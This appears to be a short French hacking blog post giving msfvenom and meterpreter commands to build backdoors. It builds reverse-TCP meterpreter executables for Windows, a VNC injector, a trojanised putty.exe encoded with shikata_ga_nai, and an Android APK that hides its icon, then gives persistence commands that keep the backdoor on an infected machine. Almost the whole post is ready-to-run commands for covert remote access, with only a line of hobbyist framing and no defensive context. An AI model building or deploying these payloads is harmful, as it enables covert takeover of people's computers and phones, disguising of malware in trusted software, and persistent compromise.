Create Backdoor (MsfVenom)

Les films & séries que nous regardons on tendance à nous influencer dans la vie. Le cinéma transmet ses idées via ses histoires et nous nous les approprions le temps d'une scéance, le temps de mêler notre réel à l'irréel. Ces derniers temps j'ai repris la série Mr.Robot, voilà quelque chose qui me parle, pour les vraies geeks barbues et les marginaux du Command Line Tool que nous sommes. Cela fait maintenant plusieurs années que je fais des sessions de "hack par intermitence", je testes diférents exploits pour m'amuser et améliorer ma technique. Comme de simple challenge, à chaque fois j'ai le souhait de repousser mes limites et d'en apprendre plus. Cela est long et parfois douleureux, mais je pense avoir une petite base de connaissance sur le framework Metasploit pour vous fournir quelques exemples d'utilisations interéssant à mettre en pratique.

Windows Backdoor

msfvenom -p "windows/meterpreter/reverse_tcp" LHOST="192.168.1.12" LPORT="6699" -f "exe" -o "backdoor.exe"
Bash
  • -p Payload
  • LHOST IP address (Attack Machine)
  • LPORT Port access
  • -f File Format
  • -o Output

VNC Inject

msfvenom -p "windows/vncinject/reverse_tcp" LHOST="192.168.1.12" LPORT="6699" -f "exe" -o "gui.exe"
Bash

Hide Backdoor

msfvenom -p "windows/meterpreter/reverse_tcp" LHOST="192.168.1.12" LPORT="6699" -x "putty.exe" -k -e "x86/shikata_ga_nai" -i 3 -b "\x00" -f "exe" -o "puttyX.exe"
Bash
  • -p Payload
  • LHOST IP address (Attack Machine)
  • LPORT Port access
  • -x Old executable
  • -e Encrypted
  • -f File Format
  • -o Output

Android Backdoor

msfvenom -p "android/meterpreter/reverse_tcp" LHOST="192.168.1.12" LPORT="6699" AndroidHideAppIcon="true" AndroidMeterpreterDebug="true" AndroidWakelock="true" -o "backdoor.apk"
Bash
  • -p Payload
  • LHOST IP address (Attack Machine)
  • LPORT Port access
  • -o Output

Persistence Backddor

Pour finir en beauté, lors de l'ouverture d'une session avec l'un de vos payload, vous voudriez peut-être faire en sorte que votre backdoor "persiste" dans le temps sur la machine infecté. Pour cela rien de bien compliqué, une commande existe déjà sur Metasploit.

meterpreter> run persistence -U i 5 -p "8080" -r "192.168.1.12"
Bash
meterpreter> run persistence –A –L "c:\\" -X 5 –p "8080" -r "192.168.1.12"
Bash

MarquandT

Ethical Hacker ~ Web Developper ~ File Hosting Provider ~ Crypto Enthusiast ~ Automation Expert Bitcoin donation: 32Uu4NKGnxSPC7UukYXVyRHwbppbQpKVki

997